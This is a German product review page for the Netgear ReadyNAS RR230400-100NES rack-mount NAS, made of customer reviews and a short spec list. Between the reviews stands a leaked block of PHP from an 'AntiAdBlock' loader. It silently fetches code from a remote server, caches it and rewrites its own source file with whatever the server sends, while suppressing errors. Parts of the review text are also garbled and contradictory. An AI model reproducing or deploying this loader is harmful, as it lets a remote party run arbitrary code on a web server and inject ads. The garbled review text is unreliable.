Netgear RR230400-100NES Ready-NAS Network Attached Storage, Gute NAS Lösung für Privat und kleine Firmen

In den letzten jahren habe ich schon einige nas system benutzt, die meisten waren kleinere systeme mit 2 laufwerksschächten, konzipiert für den heimgebrauch (netgear, wd, seagate). Allen gemein war aber, dass ich schnell an die grenzen der kapazität gelangt bin und mich die schreib-/lesegeschwindigkeit meistens eher enttäuscht hat. Vor einiger zeit bin ich daher auf eine potentere lösung, basierend auf günstiger server hardware (dell poweredge t-20, intel pentium g3220, 12gb ram) und freenas umgestiegen. Dieses system betreibe ich nun schon einige zeit und bin sehr zufrieden. Doch es gibt ein manko: es ist ein ‘bastelsystem’, an dem oft per hand das ein oder andere korrigiert werden muss. Dementsprechend gespannt war ich nun mit dem readynas ein nas für den professionellen einsatz zu testen und mit meiner ‘bastellösung’ zu vergleichen. Auch wenn das freenas system deutlich potenter ist, halte ich einen vergleich für durchaus angemessen, da beide lösungen in der gleichen preisklasse spielen. Das readynas kommt ohne festplatten daher. Für den test habe ich zwei 2tb festplatten montiert. Das geht schnell vonstatten und das system kann gestartet werden.

Mittlerweile habe ich das netgear seit 3 wochen in betrieb. Aufbau / einbau der platten:als erstes muss ich sagen ich war überrascht wie gut das teil verpackt war und alles dabei was man für den betrieb braucht – außer die festplatten natürlich. Wobei, auf der homepage war ein schönes schnell -instalationssystem für die festplatten abgebildet, welches jedoch bei meinem system nicht dabei war. Hier musste ich – wie man es gewohnt ist – die festplatten noch per hand festschrauben. Die erste inbetriebnahme habe ich per anleitung gemacht, wobei mir auffiel, dass in der anleitung ein paar kleine fehler sind mit der bezeichnung der taster und schalter, z. Der sicherungskasten um eine sicherung zu starten gibt es bei dem gerät nicht. Im großen und ganzen kommt man trotzdem durch die einrichtung. Die konfiguration des nas wird, wie auch die bedienung, über den internetbrowser des rechners erledigt und kann nach anleitung schritt für schritt sehr einfach durchgeführt werden. Wobei auch hier ein paar fehler auftauchen, die wahrscheinlich auf eine geupdatete hp zurückzuführen sind, aber da sich dieses gerät wahrscheinlich keiner holen wird, der sich nicht mit rechnern auskennt, dürfte es kein problem sein.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Das rn2120-200nes readynas von netgear kam sehr gut verpackt bei uns an. Entsprechende kabel für den einsatz in europa, usa und china sind im lieferumfang enthalten. Eine bedienungsanleitung ist natürlich dabei, auch wenn nicht immer alle abbildungen mit dem gerät übereinstimmen. Dennoch findet man sich zurecht. Neben dem front usb gibt es je zwei 3. 0 usb, esata und gb-lan rückseitig. Externe erweiterungen sind also möglich. Mit bis zu 4 festplatten (nicht im lieferumfang enthalten) mit max. Je 6tb lässt sich das nas bestücken. Diese lassen sich sehr einfach einsetzen, müssen jedoch auf dem schlitten geschraubt werden. Die eingesetzten festplatten werden von haus aus formatiert. Bei einem start in ein vorhandenes netzwerk wird das nas automatisch erkannt, wenn die festplatten eingesetzt sind. Die einrichtung über einen browser oder dem hilfsprogramm geht problemlos von statten. Es lassen sich verschiedene rollen einrichten und mit rechten hinterlegen.

Key Spezifikationen für Netgear RR230400-100NES Ready-NAS Network Attached Storage:

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Die 2000er- und 3000er-Rackmount-ReadyNAS-Reihe ist die ideale Lösung für KMU, die Dateibereitstellung und Datensicherung benötigt, um Arbeitsgruppen von bis zu 40 Mitarbeitern zu unterstützen.
  • CPU – Intel Celeron Dual Core 2,0 GHz, 2GB, SATA/SDD 2,5” oder 3,5”
  • 5 Jahre mit NBD-HW-Ersatz

Kommentare von Käufern

“Top Ware – TOP Preis!, Sehr gute Netzwerkspeicherlösung für Heimanwendung & Kleinbusiness, einfach einzurichtendes NAS für kleine Firmen”

Einfach spitze, was dieses gerät kann, top werte, top qualität, sehr zu empfehlen. Wir würden es jederzeit wieder kaufen.

Ich kaufte das gerät für mich zu hause für den privaten einsatz. Da das gerät problemlos in einen 19″ schrank montiert werden kann entschloss ich mich trotz des deswegen höheren preises für ein rackmount fähiges nas. Wegen der guten beurteilungen im internet über netgears nas wollte ich dieses hier testen. Die einrichtung des systems verlief, auch für einen leihen was netzwerk technik betrifft, vollkommen ohne probleme. Ich konnte bisher keinerlei kritikpunkte erkennen. Netgear RR230400-100NES Ready-NAS Network Attached Storage Bewertungen

Das netgear readynas rn2120 richtet sich in erster linie an unternehmen. Es ist für den einsatz mit vmware und hyperv zertifiziert undunterstützt thin provisioning. Es passt aber auch sehr gut zu hause oder im kleinen büro in einen medien-schrank, wenn er für die rack-montage geeignet ist. Das nas hat zwei gb lan-ports für redundante verbindungen und 3 usb- sowie 2 esata-ports für externe erweiterungen. Die bereitgestellten funktionen sind umfangreich und vollständig. Der geräuschpegel des geräts ist moderat. Nur beim starten und bei starker auslastung sind die lüfter deutlich hörbar, sonst ist das gerät nahezu lautlos. Das setup war überraschend einfach. Festplatten einbauen, einschalten, netzwerkverbindung herstellen und es konfiguriert das nas fast von selbst. Über die sehr aufgeräumte weboberfläche kann das nas lokal oder über eine netgear-webseite konfiguriert werden.

Sehr gutes professionelles nas. Ausgestattet mit festplatten von wd ist das nas sehr schnell. Die einrichtung geht einfach von der hand. Wer platz hat und professionellen orientiert ist, kann hier bedenkenlos zugreifen. Das netgear readynas 2120 zeichnet sich durch seine sehr gute ausstattung und zuverlässigkeit aus. Aus diesem grund ist ein einsatz im professionellen umfeld kein problem, es wurde wahrscheinlich auch dafür konzipiert. Für einen typischen home-user (fotos, videos,. ) ist es eigentlich schon überdimensioniert. Das wechseln der festplatten geht sehr einfach, auch während dem betrieb. Mit dem netgear readynas ist man sehr gut für die zukunft gerüstet.

Wir haben für uns privat sowie büro im haus schon länger über eine nas lösung diskutiert. Da kam das netgear gerade recht. Das gerät wird zum einbau in einen netzwerkschrank geliefert. Da das gerät anscheinend auch in andere länder geliefert wird, sind auch hier die stromkabel inklusive. Da beim lieferung keine festplatten inklusive sind, haben wir uns auf der netgear seite informiert und dies dazubestellt. 4 festplatten bis zu 6 tb möglich. Die einrichtigung ist realtiv einfach, allerdings ist die beiliegende beschreibung nicht umbedingt hilfreich, da hier ein anderes gerät nach meiner meingung abgebildet ist. Lan-kabel, installierungs-cd-rom und wie schon geschrieben stromkabel sind inklusive. Wir haben das gerät jetzt ein paar wochen in betrieb und es läuft sehr stabil und hatten keine probleme damit.

Das gezeigte nas richtet sich vor allem an kleine bis mittlere unternehmen bis schätzungsweise 10 mitarbeiter (mehr oder weniger je nach unternehmen und datenauslastung bzw. Bei der ankunft war es mehr als sicher verpackt. In der regel nicht so wichtig, aber die optik ist auch gar nicht schlecht, auch wenn es eh im serverschrank verschwindet. Der ist bei uns aber durchsichtig und das nas macht sich sehr gut neben unserem dell poweredge t620 server. Im lieferumfang enthalten sind 3 netzkabel für eu, usa und china sowie ein lan kabel. Die versprochene software cd lag bei uns leider nicht bei, aber die 2,6mb große software ist schnell heruntergeladen und bei einem bereits funktionierendem netzwerk auch nicht nötig, da die einrichtung auch über eine webadresse funktioniert. Zu den anschlüssen: neben den 4 bays befinden sich 2 netzwerkanschlüsse, 2 usb3 , 2 mal esata anschlüsse sowie 3 lüfter und natürlich der netzschalter und netzanschluss auf der rückseite. Vorne befindet sich ein weiterer usb anschluss, die power leds, der eigentliche an und ausschalter sowie der reset knopf. Das nas fasst 4 festplatten bis zu jeweils 6tb.

Um dieses nas in betrieb nehmen zu können braucht man mind. 4 festplatten mit einer kapa von bis zu 6tb. Ohne festplatte wird das system nicht erkannt. Welche festplatten mit diesem nas kompatibel sind, kann man auf der netgear homepage in erfahrung bringen. Entweder man nutzt bereits formatierte festplatten oder das nas formatiert automatisch nach dem erkennen der festplatten. Der einbau in einen server-schrank ist aus meiner sicht wegen der schalldämmung ratsam, da das nas im betrieb recht laut ist. Netzkabel und lan-kabel werden mitgeliefert. Die einrichtung kann entweder mit hilfe der beiliegenden cd-rom erfolgen oder alternativ auch über eine webadresse heruntergeladen werden. Anschlüsse: 2x usb3, 1x usb2, 2x netzwerk-anschlüsse, 4x bays, 2x esata.

Nas systeme kenne ich bisher nur von qnap(bzw. Fujitsu) oder synologie und ich war gespannt wie sich das rack-nas dazu machen würde. Es liegen gleich drei stromkabel mit unterschiedlichen steckern bei, einem einsatz in europa oder usa steht also nichts im wege. Die hardware ist gut, ein schneller prozessor, 2 gb ram, ein front usb, 2x 3. 0 usb und 2x esata und 2x gb-lan machen es möglich das 4er rack noch entsprechend zu erweitern und vor allem die doppelte lan anbindung macht das gerät nicht nur schnell, sondern auch etwas ausfallsicherer. Die Übertragungsrate beim schreiben ist dank des prozessors übrigens relativ gut, allerdings brauchen aktionen wie eine platte aus dem raid wieder herstellen oder kopieren großer mengen kleiner dateien dann doch fats genau so lange wie bei meinem 5 jahre alten nas (sprich: mehrere stunden bzw tage). Da hätte ich mir von den aktuellen geräten doch mehr erwartet. Inbetriebnahme:die beiliegende anleitung ist offenbar für ein anderes gerät geschrieben worden, es stimmen nämlich nicht immer alle angaben/bilder, manche schalter etc sind an anderen stellen, aber man findet sich irgendwie dennoch zurecht. Der einbau der festplatten geht ziemlich leicht. Ein satz von 16 schreiben liegt bei.

Das netgear readynas netzwerkspeicher system rr230400-100nes wird in einer einfach gehaltenen, lediglich mit dem herstellerlogo verzierten kartonage geliefert. Festplatten sind hier keine enthalten. Die 4 schächte lassen sich mit insgesamt bis zu 40 tb ausstatten. Bei mir kommen aktuell 2x 4 tb wd red zum einsatz, welche genau wie das nas system für den dauerbetrieb 24/7 geeignet sind. Platten und nas harmonieren sehr gut. Neben 3,5 zoll festplatten, kann man auch 2,5 zoll festplatten und ssds verwenden. Über die 3 vorhandenen usb 3. 0 schnittstellen kann man externe festplatten und oder usb sticks anhängen. Das system ist hot-swap fähig und somit sind die festplatten in den schächten leicht, schnell und während des betriebes austauschbar. Inbetriebnahme und einrichtung setzt zwar etwas netzwerkkenntnis voraus, als privatanwender ohne erfahrung kann man sich aber auch leicht verständlich einlesen.

Summary
Review Date
Reviewed Item
Netgear RR230400-100NES Ready-NAS Network Attached Storage
Rating
4,0 of 5 stars, based on 13 reviews